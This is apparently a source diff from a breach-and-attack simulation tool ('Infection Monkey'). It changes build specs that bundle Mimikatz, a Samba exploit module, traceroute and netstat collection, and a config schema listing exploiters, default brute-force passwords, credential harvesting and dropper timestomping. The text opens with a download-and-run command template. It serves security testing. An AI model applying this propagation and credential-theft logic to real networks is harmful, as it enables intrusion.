"; chmod +x %(monkey_path)s " \
|
||||
"&& %(monkey_path)s %(monkey_type)s %(parameters)s"
|
||||
|
||||
DOWNLOAD_TIMEOUT = 300
|
|
@ -1,32 +0,0 @@
|
|||
# -*- mode: python -*-
|
||||
|
||||
block_cipher = None
|
||||
|
||||
|
||||
a = Analysis(['main.py'],
|
||||
pathex=['..'],
|
||||
binaries=None,
|
||||
datas=None,
|
||||
hiddenimports=['_cffi_backend'],
|
||||
hookspath=None,
|
||||
runtime_hooks=None,
|
||||
excludes=None,
|
||||
win_no_prefer_redirects=None,
|
||||
win_private_assemblies=None,
|
||||
cipher=block_cipher)
|
||||
|
||||
a.binaries += [('sc_monkey_runner32.so', './bin/sc_monkey_runner32.so', 'BINARY')]
|
||||
a.binaries += [('sc_monkey_runner64.so', './bin/sc_monkey_runner64.so', 'BINARY')]
|
||||
|
||||
pyz = PYZ(a.pure, a.zipped_data,
|
||||
cipher=block_cipher)
|
||||
exe = EXE(pyz,
|
||||
a.scripts,
|
||||
a.binaries,
|
||||
a.zipfiles,
|
||||
a.datas,
|
||||
name='monkey',
|
||||
debug=False,
|
||||
strip=True,
|
||||
upx=True,
|
||||
console=True )
|
|
@ -120,9 +120,6 @@ class InfectionMonkey(object):
|
|||
ControlClient.keepalive()
|
||||
ControlClient.load_control_config()
|
||||
|
||||
LOG.debug("Users to try: %s" % str(WormConfiguration.exploit_user_list))
|
||||
LOG.debug("Passwords to try: %s" % str(WormConfiguration.exploit_password_list))
|
||||
|
||||
self._network.initialize()
|
||||
|
||||
self._exploiters = WormConfiguration.exploiter_classes
|
||||
|
|
|
@ -2,39 +2,120 @@
|
|||
import os
|
||||
import platform
|
||||
|
||||
|
||||
__author__ = 'itay.mizeretz'
|
||||
|
||||
block_cipher = None
|
||||
|
||||
# Name of zip file in monkey. That's the name of the file in the _MEI folder
|
||||
MIMIKATZ_ZIP_NAME = 'tmpzipfile123456.zip'
|
||||
|
||||
|
||||
def get_mimikatz_zip_path():
|
||||
if platform.architecture()[0] == "32bit":
|
||||
return '.\\bin\\mk32.zip'
|
||||
else:
|
||||
return '.\\bin\\mk64.zip'
|
||||
|
||||
|
||||
def main():
|
||||
a = Analysis(['main.py'],
|
||||
pathex=['..'],
|
||||
hiddenimports=['_cffi_backend', 'queue'],
|
||||
hiddenimports=get_hidden_imports(),
|
||||
hookspath=None,
|
||||
runtime_hooks=None)
|
||||
runtime_hooks=None,
|
||||
binaries=None,
|
||||
datas=None,
|
||||
excludes=None,
|
||||
win_no_prefer_redirects=None,
|
||||
win_private_assemblies=None,
|
||||
cipher=block_cipher
|
||||
)
|
||||
|
||||
a.binaries += [('sc_monkey_runner32.so', '.\\bin\\sc_monkey_runner32.so', 'BINARY')]
|
||||
a.binaries += [('sc_monkey_runner64.so', '.\\bin\\sc_monkey_runner64.so', 'BINARY')]
|
||||
a.binaries += get_binaries()
|
||||
a.datas = process_datas(a.datas)
|
||||
|
||||
if platform.system().find("Windows") >= 0:
|
||||
a.datas = [i for i in a.datas if i[0].find('Include') < 0]
|
||||
a.datas += [(MIMIKATZ_ZIP_NAME, get_mimikatz_zip_path(), 'BINARY')]
|
||||
|
||||
pyz = PYZ(a.pure)
|
||||
pyz = PYZ(a.pure, a.zipped_data, cipher=block_cipher)
|
||||
exe = EXE(pyz,
|
||||
a.scripts,
|
||||
a.binaries + [('msvcr100.dll', os.environ['WINDIR'] + '\\system32\\msvcr100.dll', 'BINARY')],
|
||||
a.binaries,
|
||||
a.zipfiles,
|
||||
a.datas,
|
||||
name='monkey.exe',
|
||||
name=get_monkey_filename(),
|
||||
debug=False,
|
||||
strip=None,
|
||||
strip=get_exe_strip(),
|
||||
upx=True,
|
||||
console=True,
|
||||
icon='monkey.ico')
|
||||
icon=get_exe_icon())
|
||||
|
||||
|
||||
def is_windows():
|
||||
return platform.system().find("Windows") >= 0
|
||||
|
||||
|
||||
def is_32_bit():
|
||||
return platform.architecture()[0] == "32bit"
|
||||
|
||||
|
||||
def get_bin_folder():
|
||||
return os.path.join('.', 'bin')
|
||||
|
||||
|
||||
def get_bin_file_path(filename):
|
||||
return os.path.join(get_bin_folder(), filename)
|
||||
|
||||
|
||||
def process_datas(orig_datas):
|
||||
datas = orig_datas
|
||||
if is_windows():
|
||||
datas = [i for i in datas if i[0].find('Include') < 0]
|
||||
datas += [(MIMIKATZ_ZIP_NAME, get_mimikatz_zip_path(), 'BINARY')]
|
||||
return datas
|
||||
|
||||
|
||||
def get_binaries():
|
||||
binaries = get_windows_only_binaries() if is_windows() else get_linux_only_binaries()
|
||||
binaries += get_sc_binaries()
|
||||
binaries += get_traceroute_binaries()
|
||||
return binaries
|
||||
|
||||
|
||||
def get_windows_only_binaries():
|
||||
binaries = []
|
||||
binaries += get_msvcr()
|
||||
return binaries
|
||||
|
||||
|
||||
def get_linux_only_binaries():
|
||||
binaries = []
|
||||
return binaries
|
||||
|
||||
|
||||
def get_hidden_imports():
|
||||
return ['_cffi_backend', 'queue'] if is_windows() else ['_cffi_backend']
|
||||
|
||||
|
||||
def get_sc_binaries():
|
||||
return [(x, get_bin_file_path(x), 'BINARY') for x in ['sc_monkey_runner32.so', 'sc_monkey_runner64.so']]
|
||||
|
||||
|
||||
def get_msvcr():
|
||||
return [('msvcr100.dll', os.environ['WINDIR'] + '\\system32\\msvcr100.dll', 'BINARY')]
|
||||
|
||||
|
||||
def get_traceroute_binaries():
|
||||
traceroute_name = 'traceroute32' if is_32_bit() else 'traceroute64'
|
||||
return [(traceroute_name, get_bin_file_path(traceroute_name), 'BINARY')]
|
||||
|
||||
|
||||
def get_monkey_filename():
|
||||
return 'monkey.exe' if is_windows() else 'monkey'
|
||||
|
||||
|
||||
def get_exe_strip():
|
||||
return not is_windows()
|
||||
|
||||
|
||||
def get_exe_icon():
|
||||
return 'monkey.ico' if is_windows() else None
|
||||
|
||||
|
||||
def get_mimikatz_zip_path():
|
||||
mk_filename = 'mk32.zip' if is_32_bit() else 'mk64.zip'
|
||||
return os.path.join(get_bin_folder(), mk_filename)
|
||||
|
||||
|
||||
main() # We don't check if __main__ because this isn't the main script.
|
||||
|
|
|
@ -101,9 +101,7 @@ int samba_init_module(void)
|
|||
}
|
||||
|
||||
// Build commandline
|
||||
strncat(commandline, RUN_MONKEY_CMD, sizeof(RUN_MONKEY_CMD) - 1);
|
||||
strncat(commandline, MONKEY_DEST_NAME, sizeof(MONKEY_DEST_NAME) - 1);
|
||||
strncat(commandline, " ", 1);
|
||||
snprintf(commandline, sizeof(commandline), "%s%s ", RUN_MONKEY_CMD, MONKEY_DEST_NAME);
|
||||
|
||||
fread(commandline + strlen(commandline), 1, LINE_MAX_LENGTH, pFile);
|
||||
fclose(pFile);
|
||||
|
|
|
@ -9,9 +9,13 @@ import re
|
|||
|
||||
from six.moves import range
|
||||
|
||||
from infection_monkey.pyinstaller_utils import get_binary_file_path
|
||||
from infection_monkey.utils import is_64bit_python
|
||||
|
||||
DEFAULT_TIMEOUT = 10
|
||||
BANNER_READ = 1024
|
||||
IP_ADDR_RE = r'[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
|
||||
IP_ADDR_RE = r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}'
|
||||
IP_ADDR_PARENTHESES_RE = r'\(' + IP_ADDR_RE + r'\)'
|
||||
|
||||
LOG = logging.getLogger(__name__)
|
||||
SLEEP_BETWEEN_POLL = 0.5
|
||||
|
@ -175,9 +179,10 @@ def tcp_port_to_service(port):
|
|||
return 'tcp-' + str(port)
|
||||
|
||||
|
||||
def traceroute(target_ip, ttl):
|
||||
def traceroute(target_ip, ttl=64):
|
||||
"""
|
||||
Traceroute for a specific IP/name.
|
||||
Note, may throw exception on failure that should be handled by caller.
|
||||
:param target_ip: IP/name of target
|
||||
:param ttl: Max TTL
|
||||
:return: Sequence of IPs in the way
|
||||
|
@ -188,6 +193,53 @@ def traceroute(target_ip, ttl):
|
|||
return _traceroute_linux(target_ip, ttl)
|
||||
|
||||
|
||||
def _get_traceroute_bin_path():
|
||||
"""
|
||||
Gets the path to the prebuilt traceroute executable
|
||||
|
||||
This is the traceroute utility from: http://traceroute.sourceforge.net
|
||||
Its been built using the buildroot utility with the following settings:
|
||||
* Statically link to musl and all other required libs
|
||||
* Optimize for size
|
||||
This is done because not all linux distros come with traceroute out-of-the-box, and to ensure it behaves as expected
|
||||
|
||||
:return: Path to traceroute executable
|
||||
"""
|
||||
return get_binary_file_path("traceroute64" if is_64bit_python() else "traceroute32")
|
||||
|
||||
|
||||
def _parse_traceroute(output, regex, ttl):
|
||||
"""
|
||||
Parses the output of traceroute (from either Linux or Windows)
|
||||
:param output: The output of the traceroute
|
||||
:param regex: Regex for finding an IP address
|
||||
:param ttl: Max TTL. Must be the same as the TTL used as param for traceroute.
|
||||
:return: List of ips which are the hops on the way to the traceroute destination.
|
||||
If a hop's IP wasn't found by traceroute, instead of an IP, the array will contain None
|
||||
"""
|
||||
ip_lines = output.split('\n')
|
||||
trace_list = []
|
||||
|
||||
first_line_index = None
|
||||
for i in range(len(ip_lines)):
|
||||
if re.search(r'^\s*1', ip_lines[i]) is not None:
|
||||
first_line_index = i
|
||||
break
|
||||
|
||||
for i in range(first_line_index, first_line_index + ttl):
|
||||
if re.search(r'^\s*' + str(i - first_line_index + 1), ip_lines[i]) is None: # If trace is finished
|
||||
break
|
||||
|
||||
re_res = re.search(regex, ip_lines[i])
|
||||
if re_res is None:
|
||||
ip_addr = None
|
||||
else:
|
||||
ip_addr = re_res.group()
|
||||
trace_list.append(ip_addr)
|
||||
|
||||
return trace_list
|
||||
|
||||
|
||||
def _traceroute_windows(target_ip, ttl):
|
||||
"""
|
||||
Traceroute for a specific IP/name - Windows implementation
|
||||
|
@ -200,59 +252,22 @@ def _traceroute_windows(target_ip, ttl):
|
|||
target_ip]
|
||||
proc_obj = subprocess.Popen(cli, stdout=subprocess.PIPE)
|
||||
stdout, stderr = proc_obj.communicate()
|
||||
ip_lines = stdout.split('\r\n')
|
||||
trace_list = []
|
||||
|
||||
first_line_index = None
|
||||
for i in range(len(ip_lines)):
|
||||
if re.search(r'^\s*1', ip_lines[i]) is not None:
|
||||
first_line_index = i
|
||||
break
|
||||
|
||||
for i in range(first_line_index, first_line_index + ttl):
|
||||
if re.search(r'^\s*' + str(i - first_line_index + 1), ip_lines[i]) is None: # If trace is finished
|
||||
break
|
||||
|
||||
re_res = re.search(IP_ADDR_RE, ip_lines[i])
|
||||
if re_res is None:
|
||||
ip_addr = None
|
||||
else:
|
||||
ip_addr = re_res.group()
|
||||
trace_list.append(ip_addr)
|
||||
|
||||
return trace_list
|
||||
stdout = stdout.replace('\r', '')
|
||||
return _parse_traceroute(stdout, IP_ADDR_RE, ttl)
|
||||
|
||||
|
||||
def _traceroute_linux(target_ip, ttl):
|
||||
"""
|
||||
Traceroute for a specific IP/name - Linux implementation
|
||||
"""
|
||||
# implementation note: We're currently going to just use ping.
|
||||
# reason is, implementing a non root requiring user is complicated (see traceroute(8) code)
|
||||
# while this is just ugly
|
||||
# we can't use traceroute because it's not always installed
|
||||
current_ttl = 1
|
||||
trace_list = []
|
||||
while current_ttl <= ttl:
|
||||
cli = ["ping",
|
||||
"-c", "1",
|
||||
"-w", "1",
|
||||
"-t", str(current_ttl),
|
||||
|
||||
cli = [_get_traceroute_bin_path(),
|
||||
"-m", str(ttl),
|
||||
target_ip]
|
||||
proc_obj = subprocess.Popen(cli, stdout=subprocess.PIPE)
|
||||
stdout, stderr = proc_obj.communicate()
|
||||
ips = re.findall(IP_ADDR_RE, stdout)
|
||||
if len(ips) < 2: # Unexpected output. Fail the whole thing since it's not reliable.
|
||||
return []
|
||||
elif ips[-1] in trace_list: # Failed getting this hop
|
||||
trace_list.append(None)
|
||||
else:
|
||||
trace_list.append(ips[-1])
|
||||
dest_ip = ips[0] # first ip is dest ip. must be parsed here since it can change between pings
|
||||
|
||||
if dest_ip == ips[-1]:
|
||||
break
|
||||
|
||||
current_ttl += 1
|
||||
|
||||
return trace_list
|
||||
lines = _parse_traceroute(stdout, IP_ADDR_PARENTHESES_RE, ttl)
|
||||
lines = [x[1:-1] if x else None # Removes parenthesis
|
||||
for x in lines]
|
||||
return lines
|
||||
|
|
|
@ -1,4 +1,5 @@
|
|||
How to build a monkey binary from scratch.
|
||||
To get development versions of Monkey Island and Monkey look into deployment scripts folder.
|
||||
If you only want to monkey from scratch you may refer to the instructions below.
|
||||
|
||||
The monkey is composed of three separate parts.
|
||||
* The Infection Monkey itself - PyInstaller compressed python archives
|
||||
|
|
|
@ -8,6 +8,7 @@ from enum import IntEnum
|
|||
from infection_monkey.network.info import get_host_subnets
|
||||
from infection_monkey.system_info.aws_collector import AwsCollector
|
||||
from infection_monkey.system_info.azure_cred_collector import AzureCollector
|
||||
from infection_monkey.system_info.netstat_collector import NetstatCollector
|
||||
|
||||
LOG = logging.getLogger(__name__)
|
||||
|
||||
|
@ -107,12 +108,16 @@ class InfoCollector(object):
|
|||
def get_network_info(self):
|
||||
"""
|
||||
Adds network information from the host to the system information.
|
||||
Currently updates with a list of networks accessible from host,
|
||||
containing host ip and the subnet range.
|
||||
Currently updates with netstat and a list of networks accessible from host
|
||||
containing host ip and the subnet range
|
||||
:return: None. Updates class information
|
||||
"""
|
||||
LOG.debug("Reading subnets")
|
||||
self.info['network_info'] = {'networks': get_host_subnets()}
|
||||
self.info['network_info'] =\
|
||||
{
|
||||
'networks': get_host_subnets(),
|
||||
'netstat': NetstatCollector.get_netstat_info()
|
||||
}
|
||||
|
||||
def get_azure_info(self):
|
||||
"""
|
||||
|
|
|
@ -0,0 +1,44 @@
|
|||
# Inspired by Giampaolo Rodola's psutil example from https://github.com/giampaolo/psutil/blob/master/scripts/netstat.py
|
||||
|
||||
import logging
|
||||
import psutil
|
||||
import socket
|
||||
|
||||
from socket import AF_INET, SOCK_STREAM, SOCK_DGRAM
|
||||
|
||||
__author__ = 'itay.mizeretz'
|
||||
|
||||
LOG = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class NetstatCollector(object):
|
||||
"""
|
||||
Extract netstat info
|
||||
"""
|
||||
|
||||
AF_INET6 = getattr(socket, 'AF_INET6', object())
|
||||
|
||||
proto_map = {
|
||||
(AF_INET, SOCK_STREAM): 'tcp',
|
||||
(AF_INET6, SOCK_STREAM): 'tcp6',
|
||||
(AF_INET, SOCK_DGRAM): 'udp',
|
||||
(AF_INET6, SOCK_DGRAM): 'udp6',
|
||||
}
|
||||
|
||||
@staticmethod
|
||||
def get_netstat_info():
|
||||
LOG.info("Collecting netstat info")
|
||||
return [NetstatCollector._parse_connection(c) for c in psutil.net_connections(kind='inet')]
|
||||
|
||||
@staticmethod
|
||||
def _parse_connection(c):
|
||||
return \
|
||||
{
|
||||
'proto': NetstatCollector.proto_map[(c.family, c.type)],
|
||||
'local_address': c.laddr[0],
|
||||
'local_port': c.laddr[1],
|
||||
'remote_address': c.raddr[0] if c.raddr else None,
|
||||
'remote_port': c.raddr[1] if c.raddr else None,
|
||||
'status': c.status,
|
||||
'pid': c.pid
|
||||
}
|
|
@ -38,6 +38,8 @@ class WindowsInfoCollector(InfoCollector):
|
|||
super(WindowsInfoCollector, self).get_info()
|
||||
self.get_wmi_info()
|
||||
self.get_installed_packages()
|
||||
from infection_monkey.config import WormConfiguration
|
||||
if WormConfiguration.should_use_mimikatz:
|
||||
self.get_mimikatz_info()
|
||||
|
||||
return self.info
|
||||
|
|
|
@ -9,890 +9,11 @@ from cc.database import mongo
|
|||
from cc.encryptor import encryptor
|
||||
from cc.environment.environment import env
|
||||
from cc.utils import local_ip_addresses
|
||||
|
||||
from config_schema import SCHEMA
|
||||
__author__ = "itay.mizeretz"
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
WARNING_SIGN = u" \u26A0"
|
||||
|
||||
SCHEMA = {
|
||||
"title": "Monkey",
|
||||
"type": "object",
|
||||
"definitions": {
|
||||
"exploiter_classes": {
|
||||
"title": "Exploit class",
|
||||
"type": "string",
|
||||
"anyOf": [
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"SmbExploiter"
|
||||
],
|
||||
"title": "SMB Exploiter"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"WmiExploiter"
|
||||
],
|
||||
"title": "WMI Exploiter"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"RdpExploiter"
|
||||
],
|
||||
"title": "RDP Exploiter (UNSAFE)"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"Ms08_067_Exploiter"
|
||||
],
|
||||
"title": "MS08-067 Exploiter (UNSAFE)"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"SSHExploiter"
|
||||
],
|
||||
"title": "SSH Exploiter"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"ShellShockExploiter"
|
||||
],
|
||||
"title": "ShellShock Exploiter"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"SambaCryExploiter"
|
||||
],
|
||||
"title": "SambaCry Exploiter"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"ElasticGroovyExploiter"
|
||||
],
|
||||
"title": "ElasticGroovy Exploiter"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"Struts2Exploiter"
|
||||
],
|
||||
"title": "Struts2 Exploiter"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"WebLogicExploiter"
|
||||
],
|
||||
"title": "Oracle Web Logic Exploiter"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"HadoopExploiter"
|
||||
],
|
||||
"title": "Hadoop/Yarn Exploiter"
|
||||
}
|
||||
]
|
||||
},
|
||||
"finger_classes": {
|
||||
"title": "Fingerprint class",
|
||||
"type": "string",
|
||||
"anyOf": [
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"SMBFinger"
|
||||
],
|
||||
"title": "SMBFinger"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"SSHFinger"
|
||||
],
|
||||
"title": "SSHFinger"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"PingScanner"
|
||||
],
|
||||
"title": "PingScanner"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"HTTPFinger"
|
||||
],
|
||||
"title": "HTTPFinger"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"MySQLFinger"
|
||||
],
|
||||
"title": "MySQLFinger"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"MSSQLFinger"
|
||||
],
|
||||
"title": "MSSQLFinger"
|
||||
},
|
||||
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"ElasticFinger"
|
||||
],
|
||||
"title": "ElasticFinger"
|
||||
}
|
||||
]
|
||||
}
|
||||
},
|
||||
"properties": {
|
||||
"basic": {
|
||||
"title": "Basic - Credentials",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"credentials": {
|
||||
"title": "Credentials",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"exploit_user_list": {
|
||||
"title": "Exploit user list",
|
||||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"items": {
|
||||
"type": "string"
|
||||
},
|
||||
"default": [
|
||||
"Administrator",
|
||||
"root",
|
||||
"user"
|
||||
],
|
||||
"description": "List of usernames to use on exploits using credentials"
|
||||
},
|
||||
"exploit_password_list": {
|
||||
"title": "Exploit password list",
|
||||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"items": {
|
||||
"type": "string"
|
||||
},
|
||||
"default": [
|
||||
"Password1!",
|
||||
"1234",
|
||||
"password",
|
||||
"12345678"
|
||||
],
|
||||
"description": "List of password to use on exploits using credentials"
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
},
|
||||
"basic_network": {
|
||||
"title": "Basic - Network",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"general": {
|
||||
"title": "General",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"blocked_ips": {
|
||||
"title": "Blocked IPs",
|
||||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"items": {
|
||||
"type": "string"
|
||||
},
|
||||
"default": [
|
||||
],
|
||||
"description": "List of IPs to not scan"
|
||||
},
|
||||
"local_network_scan": {
|
||||
"title": "Local network scan",
|
||||
"type": "boolean",
|
||||
"default": True,
|
||||
"description": "Determines whether the monkey should scan its subnets additionally"
|
||||
},
|
||||
"depth": {
|
||||
"title": "Distance from island",
|
||||
"type": "integer",
|
||||
"default": 2,
|
||||
"description":
|
||||
"Amount of hops allowed for the monkey to spread from the island. "
|
||||
+ WARNING_SIGN
|
||||
+ " Note that setting this value too high may result in the monkey propagating too far"
|
||||
},
|
||||
"subnet_scan_list": {
|
||||
"title": "Scan IP/subnet list",
|
||||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"items": {
|
||||
"type": "string"
|
||||
},
|
||||
"default": [
|
||||
],
|
||||
"description":
|
||||
"List of IPs/subnets the monkey should scan."
|
||||
" Examples: \"192.168.0.1\", \"192.168.0.5-192.168.0.20\", \"192.168.0.5/24\""
|
||||
}
|
||||
}
|
||||
},
|
||||
"network_analysis": {
|
||||
"title": "Network Analysis",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"inaccessible_subnets": {
|
||||
"title": "Network segmentation testing",
|
||||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"items": {
|
||||
"type": "string"
|
||||
},
|
||||
"default": [
|
||||
],
|
||||
"description":
|
||||
"Test for network segmentation by providing a list of"
|
||||
" subnets that should NOT be accessible to each other."
|
||||
" For example, given the following configuration:"
|
||||
" '10.0.0.0/24, 11.0.0.2/32, 12.2.3.0/24'"
|
||||
" a Monkey running on 10.0.0.5 will try to access machines in the following"
|
||||
" subnets: 11.0.0.2/32, 12.2.3.0/24."
|
||||
" An alert on successful connections will be shown in the report"
|
||||
" Additional subnet formats include: 13.0.0.1, 13.0.0.1-13.0.0.5"
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
},
|
||||
"monkey": {
|
||||
"title": "Monkey",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"general": {
|
||||
"title": "General",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"alive": {
|
||||
"title": "Alive",
|
||||
"type": "boolean",
|
||||
"default": True,
|
||||
"description": "Is the monkey alive"
|
||||
}
|
||||
}
|
||||
},
|
||||
"behaviour": {
|
||||
"title": "Behaviour",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"self_delete_in_cleanup": {
|
||||
"title": "Self delete on cleanup",
|
||||
"type": "boolean",
|
||||
"default": False,
|
||||
"description": "Should the monkey delete its executable when going down"
|
||||
},
|
||||
"use_file_logging": {
|
||||
"title": "Use file logging",
|
||||
"type": "boolean",
|
||||
"default": True,
|
||||
"description": "Should the monkey dump to a log file"
|
||||
},
|
||||
"serialize_config": {
|
||||
"title": "Serialize config",
|
||||
"type": "boolean",
|
||||
"default": False,
|
||||
"description": "Should the monkey dump its config on startup"
|
||||
}
|
||||
}
|
||||
},
|
||||
"system_info": {
|
||||
"title": "System info",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"extract_azure_creds": {
|
||||
"title": "Harvest Azure Credentials",
|
||||
"type": "boolean",
|
||||
"default": True,
|
||||
"description":
|
||||
"Determine if the Monkey should try to harvest password credentials from Azure VMs"
|
||||
},
|
||||
"collect_system_info": {
|
||||
"title": "Collect system info",
|
||||
"type": "boolean",
|
||||
"default": True,
|
||||
"description": "Determines whether to collect system info"
|
||||
},
|
||||
"should_use_mimikatz": {
|
||||
"title": "Should use Mimikatz",
|
||||
"type": "boolean",
|
||||
"default": True,
|
||||
"description": "Determines whether to use Mimikatz"
|
||||
},
|
||||
}
|
||||
},
|
||||
"life_cycle": {
|
||||
"title": "Life cycle",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"max_iterations": {
|
||||
"title": "Max iterations",
|
||||
"type": "integer",
|
||||
"default": 1,
|
||||
"description": "Determines how many iterations of the monkey's full lifecycle should occur"
|
||||
},
|
||||
"victims_max_find": {
|
||||
"title": "Max victims to find",
|
||||
"type": "integer",
|
||||
"default": 30,
|
||||
"description": "Determines the maximum number of machines the monkey is allowed to scan"
|
||||
},
|
||||
"victims_max_exploit": {
|
||||
"title": "Max victims to exploit",
|
||||
"type": "integer",
|
||||
"default": 7,
|
||||
"description":
|
||||
"Determines the maximum number of machines the monkey"
|
||||
" is allowed to successfully exploit. " + WARNING_SIGN
|
||||
+ " Note that setting this value too high may result in the monkey propagating to "
|
||||
"a high number of machines"
|
||||
},
|
||||
"timeout_between_iterations": {
|
||||
"title": "Wait time between iterations",
|
||||
"type": "integer",
|
||||
"default": 100,
|
||||
"description":
|
||||
"Determines for how long (in seconds) should the monkey wait between iterations"
|
||||
},
|
||||
"retry_failed_explotation": {
|
||||
"title": "Retry failed exploitation",
|
||||
"type": "boolean",
|
||||
"default": True,
|
||||
"description":
|
||||
"Determines whether the monkey should retry exploiting machines"
|
||||
" it didn't successfuly exploit on previous iterations"
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
},
|
||||
"internal": {
|
||||
"title": "Internal",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"general": {
|
||||
"title": "General",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"singleton_mutex_name": {
|
||||
"title": "Singleton mutex name",
|
||||
"type": "string",
|
||||
"default": "{2384ec59-0df8-4ab9-918c-843740924a28}",
|
||||
"description":
|
||||
"The name of the mutex used to determine whether the monkey is already running"
|
||||
},
|
||||
"keep_tunnel_open_time": {
|
||||
"title": "Keep tunnel open time",
|
||||
"type": "integer",
|
||||
"default": 60,
|
||||
"description": "Time to keep tunnel open before going down after last exploit (in seconds)"
|
||||
}
|
||||
}
|
||||
},
|
||||
"classes": {
|
||||
"title": "Classes",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"scanner_class": {
|
||||
"title": "Scanner class",
|
||||
"type": "string",
|
||||
"default": "TcpScanner",
|
||||
"enum": [
|
||||
"TcpScanner"
|
||||
],
|
||||
"enumNames": [
|
||||
"TcpScanner"
|
||||
],
|
||||
"description": "Determines class to scan for machines. (Shouldn't be changed)"
|
||||
},
|
||||
"finger_classes": {
|
||||
"title": "Fingerprint classes",
|
||||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"items": {
|
||||
"$ref": "#/definitions/finger_classes"
|
||||
},
|
||||
"default": [
|
||||
"SMBFinger",
|
||||
"SSHFinger",
|
||||
"PingScanner",
|
||||
"HTTPFinger",
|
||||
"MySQLFinger",
|
||||
"MSSQLFinger",
|
||||
"ElasticFinger"
|
||||
],
|
||||
"description": "Determines which classes to use for fingerprinting"
|
||||
}
|
||||
}
|
||||
},
|
||||
"kill_file": {
|
||||
"title": "Kill file",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"kill_file_path_windows": {
|
||||
"title": "Kill file path on Windows",
|
||||
"type": "string",
|
||||
"default": "%windir%\\monkey.not",
|
||||
"description": "Path of file which kills monkey if it exists (on Windows)"
|
||||
},
|
||||
"kill_file_path_linux": {
|
||||
"title": "Kill file path on Linux",
|
||||
"type": "string",
|
||||
"default": "/var/run/monkey.not",
|
||||
"description": "Path of file which kills monkey if it exists (on Linux)"
|
||||
}
|
||||
}
|
||||
},
|
||||
"dropper": {
|
||||
"title": "Dropper",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"dropper_set_date": {
|
||||
"title": "Dropper sets date",
|
||||
"type": "boolean",
|
||||
"default": True,
|
||||
"description":
|
||||
"Determines whether the dropper should set the monkey's file date to be the same as"
|
||||
" another file"
|
||||
},
|
||||
"dropper_date_reference_path_windows": {
|
||||
"title": "Dropper date reference path (Windows)",
|
||||
"type": "string",
|
||||
"default": "%windir%\\system32\\kernel32.dll",
|
||||
"description":
|
||||
"Determines which file the dropper should copy the date from if it's configured to do"
|
||||
" so on Windows (use fullpath)"
|
||||
},
|
||||
"dropper_date_reference_path_linux": {
|
||||
"title": "Dropper date reference path (Linux)",
|
||||
"type": "string",
|
||||
"default": "/bin/sh",
|
||||
"description":
|
||||
"Determines which file the dropper should copy the date from if it's configured to do"
|
||||
" so on Linux (use fullpath)"
|
||||
},
|
||||
"dropper_target_path_linux": {
|
||||
"title": "Dropper target path on Linux",
|
||||
"type": "string",
|
||||
"default": "/tmp/monkey",
|
||||
"description": "Determines where should the dropper place the monkey on a Linux machine"
|
||||
},
|
||||
"dropper_target_path_win_32": {
|
||||
"title": "Dropper target path on Windows (32bit)",
|
||||
"type": "string",
|
||||
"default": "C:\\Windows\\monkey32.exe",
|
||||
"description": "Determines where should the dropper place the monkey on a Windows machine "
|
||||
"(32bit)"
|
||||
},
|
||||
"dropper_target_path_win_64": {
|
||||
"title": "Dropper target path on Windows (64bit)",
|
||||
"type": "string",
|
||||
"default": "C:\\Windows\\monkey64.exe",
|
||||
"description": "Determines where should the dropper place the monkey on a Windows machine "
|
||||
"(64 bit)"
|
||||
},
|
||||
"dropper_try_move_first": {
|
||||
"title": "Try to move first",
|
||||
"type": "boolean",
|
||||
"default": True,
|
||||
"description":
|
||||
"Determines whether the dropper should try to move itsel instead of copying itself"
|
||||
" to target path"
|
||||
}
|
||||
}
|
||||
},
|
||||
"logging": {
|
||||
"title": "Logging",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
